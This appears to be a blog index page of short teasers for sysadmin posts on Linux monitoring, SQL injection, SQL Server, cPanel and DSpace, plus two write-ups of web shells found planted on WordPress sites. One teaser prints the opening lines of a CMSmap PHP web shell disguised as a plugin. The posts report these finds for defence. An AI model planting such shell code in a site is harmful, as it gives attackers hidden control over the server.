htop - Basic Monitoring and Debugging Linux commands

Basic Monitoring and Debugging Linux commands

Here is a list of the most commanly used Linux commands for performance monitoring and debugging that will be helpful when you are working on Linux environment. This list is not comprehensive or authoritative by any means. However, this list has...

sql injection - How to find and stop SQL injection 💉 attacks

How to find and stop SQL injection 💉 attacks

There’s a lot of stuff out there about SQL injection attacks but there’s not much that will help you figure out how to stop these attacks from occurring. First, let’s talk about what a SQL Injection Attack really is. Some people...

Windows Server 2008 Robot Ad Wallpapers1920x1200 2 Apps Directories - ⚠️ SQL server: Terminate database connections

⚠️ SQL server: Terminate database connections

Each application taht uses your SQL Server database creates a connection on the database and this connection continues unless the session is killed or terminated privately within the application. A similar connection is established even for each...

cpanel welcome area - How to disable the Welcome panel in cPanel 94 ✔️

How to disable the Welcome panel in cPanel 94 ✔️

Back in December 2020, cPanel introduced the Welcome panel for new cPanel accounts in the cPanel version 94. This feature by default shows Creating an email and Site Publisher sections. If you have the Site Publisher option disabled globally in WHM...

SPADE SHELL - Spade Mini Shell - the easiest to use shell ever ! 😂🤣

Spade Mini Shell – the easiest to use shell ever ! 😂🤣

During a regular anaysis of a WordPress website for a new user I’ve noticed a file named wp-blogs.php in the public_html folder. As an experienced WordPress user, the name itself drew attention, as I do not recall ever seeing a file called wp...

shell - yet another variation of the CMSmap – WordPress Shell

yet another variation of the CMSmap – WordPress Shell

Noticed a file named wp-logn.php file in the plugins directory that was trying to pass as a WordPress plugin, with the following code: <?php $password='will'; $shellname='will'; $myurl=null; error_reporting(0); @set_time_limit(0); function...

dspace - How to change header text in DSpace 🤔

How to change header text in DSpace 🤔

Here is how to change the header text in DSpace xmlui interface. Open file messages.xml: nano /var/lib/tomcat8/webapps/xmlui/i18n/messages.xml Locate the following line: <message key="xmlui.dri2xhtml.structural.head-subtitle">DSpace...